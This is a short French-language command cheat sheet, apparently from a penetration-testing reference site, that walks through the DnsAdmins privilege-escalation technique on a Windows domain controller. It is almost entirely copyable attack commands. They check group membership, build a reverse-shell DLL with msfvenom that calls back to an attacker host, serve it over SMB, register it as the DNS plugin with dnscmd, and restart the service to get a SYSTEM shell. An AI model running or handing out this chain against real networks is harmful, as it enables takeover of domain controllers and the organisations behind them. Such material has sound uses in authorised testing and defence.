Windows Privilege Escalation

DNS Admins

Charger une DLL arbitraire dans le service DNS pour obtenir SYSTEM sur le DC.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'DnsAdmins'

Description: Confirmer l'appartenance au groupe DnsAdmins avant l'exploitation.

Copy command
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$PORT -f dll -o evil.dll

Description: Créer la DLL malveillante qui sera chargée par le service DNS en tant que SYSTEM.

Copy command
impacket-smbserver share $(pwd) -smb2support

Description: Héberger la DLL via un partage SMB : le service DNS ira la chercher au démarrage.

Copy command
dnscmd $DC /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll

Description: Configurer la DLL plugin dans le service DNS : persistera jusqu'au prochain restart.

Copy command
nxc smb $DC -u $USER -p $PASS -x 'sc stop dns && sc start dns'

Description: Redémarrer DNS pour déclencher le chargement de la DLL : shell SYSTEM attendu.